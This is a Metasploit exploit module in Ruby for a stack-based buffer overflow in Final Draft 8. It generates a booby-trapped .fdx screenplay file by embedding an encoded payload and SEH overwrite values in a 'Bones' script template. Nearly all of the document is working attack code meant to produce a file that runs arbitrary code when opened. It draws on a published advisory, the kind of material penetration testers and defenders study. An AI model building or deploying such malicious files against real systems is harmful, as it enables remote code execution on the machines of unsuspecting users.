require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Final Draft 8 File Format Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in Final Draft 8. Multiple fields are vulnerable to the overflow, however in is the only field to accept mixed-case characters. }, 'License' => MSF_LICENSE, 'Author' => [ 'vt [nick.freeman@security-assessment.com]' ], 'Version' => '$Revision: 10394 $', 'References' => [ [ 'URL', 'http://security-assessment.com/files/documents/advisory/Final_Draft-Multiple_Stack_Buffer_Overflows.pdf' ] ], 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'DisableNops' => true, 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, 'EncoderOptions' => { 'BufferRegister' => 'EAX', } }, 'Platform' => 'win', 'Targets' => [ [ 'Default', { } ], ], 'Privileged' => false, 'DisclosureDate' => 'Nov 29 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'evil.fdx']), ], self.class) end def exploit template = %Q| ‘BONES’ Teaser Int. Someplace perfectly normal -- day An unassuming crime scene roped off with yellow crime scene tape. Various cops and Feds pick over the spot. Booth is leading Brennan to a dusty, desiccated corpse. Special agent Booth (pointing to corpse) Right here. No one knows what to make of it. Brennan Well, that’s why I’m here. The default font for this template is Courier Final Draft. Notice that scenes are numbered at left and right margins and that the Act Breaks are in bold type. More forensic banter leads us to the end of the teaser. End of teaser Act 1 Int. Smithsonian medico-legal lab -- day Brennan, Zack, Hodgins and Booth are all standing around the exam table where the corpse has been laid out. Zack He’s been dead for a while now. Dr. Jack hodgins Your genius is terrifying. Booth enters looking frustrated. Special agent booth Any results yet? I got some serious heat on me about this case. BRENNAN It’s not cut and dried, Booth. If you look at the occipital blah blah blah and the traces of silt located in the blah blah blah ... SPECIAL AGENT BOOTH So it’s going to take a little more time? Begin musical montage: (”Some cool song” by some cool band) -- “Bones” often features a montage of work or investigation set to a modern song. -- The montage intro and end are designated by scene headings in boldface as seen above and below. -- The scenes in the montage are entered just as pieces of action with the two dash intro . -- Like this. End musical montage Int. Brennan’s co-op / brennan’s bedroom -- Night Brennan enters, exhausted, collapses on bed. Cut to: Int. Medico-legal building / angela’s area -- day Angela is standing at the laser imaging table and the reconstruction of the corpse’s face is just becoming visible. She sees something amazing. She picks up her cell phone and dials. Angela (into phone) Yeah, I think you might want to come back in. “Bones,” being an hour-long drama, has a teaser and four acts . End of act one Act four Int. Booth’s vehicle / traveling -- day Action here. BRENNAN Dialogue here. Mystery solved. End show

BONES - Ep# - .

BrennanAREPLACE_1

Bones " Episode Title " written by Writer's Name Production company name Address Line 1 draft name Address Line 2 City, State Zip code MM DD , YYYY Bones " Episode Title " CAST DR. TEMPERANCE "BONES" BRENNAN ANGELA MONTENEGRO SPECIAL AGENT SEELEY BOOTH DR. JACK HODGINS DR. CAMILLE SAROYAN DR. LANCE SWEETS Bones " Episode Title " Sets Interiors : Exteriors : Smithsonian medico-legal Lab Brennan's co-op/brennan's bedroom Medico-legal building/angela's area Booth's vehicle/travelling Brennan DR. JACK HODGINS Special agent booth Angela CAMILLE (V.O.) (O.S.) (O.C.) (SUBTITLE) INT EXT I/E DAY NIGHT AFTERNOON MORNING EVENING LATER MOMENTS LATER CONTINUOUS THE NEXT DAY CUT TO: FADE IN: FADE OUT. FADE TO: DISSOLVE TO: BACK TO: MATCH CUT TO: JUMP CUT TO: FADE TO BLACK. | seh = "\x77\x72\x78" # is null terminated nseh = "\x49\x39\x22\x77" # this address + 16h points to the stack sploit = template.gsub(/REPLACE_1/, "\x40"*7756+payload.encoded+("\x41"*(2268-payload.encoded.length))+nseh+seh) print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sploit) end end